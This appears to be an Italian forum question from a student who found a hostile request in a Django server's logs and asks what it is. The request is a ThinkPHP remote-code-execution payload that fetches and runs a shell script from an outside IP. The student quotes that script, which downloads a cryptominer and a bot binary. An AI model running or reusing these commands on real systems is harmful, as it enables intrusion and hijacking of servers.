Ho sviluppato un'applicazione Django per un progetto scolastico e l'ho ospitata su un'istanza EC2 per testare e apprendere l'ambiente.
Durante l'ispezione dei log, ho trovato la seguente richiesta GET,
"GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20http://205.185.113.123/ex.sh;chmod%20777%20ex.sh;sh%20ex.sh HTTP/1.1" 200 9472
Questo sembra strano perché non uso PHP, suppongo che qualcuno presume che io usi PHP, quindi ho provato a scaricare ed eseguire uno script ex.sh
da 205.185.113.123
. Il contenuto di quello script è,
cd /tmp; wget http://205.185.113.123/mcoin; chmod 777 mcoin; ./mcoin -o 205.185.113.123:3333 -p x -k -a cryptonight -B --max-cpu-usage=90; rm -rf RjsWs
cd /tmp; wget http://205.185.113.123/sefa.x86; chmod 777 sefa.x86; ./sefa.x86 xd
rm -rf ex.sh
Dato che non conosco molto bene le app e la sicurezza web, ho alcune domande,
- È un attacco? In tal caso, qual è il nome di questo attacco?
- Questo attacco può essere adattato per Django anziché per PHP?
- È normale per le app Web? Ricevono sempre questo tipo di richieste?
- In base al link , l'indirizzo IP è registrato per una società denominata FranTech Solutions. Sono collegati a questo attacco?
- È illegale? In tal caso, posso intraprendere un'azione legale?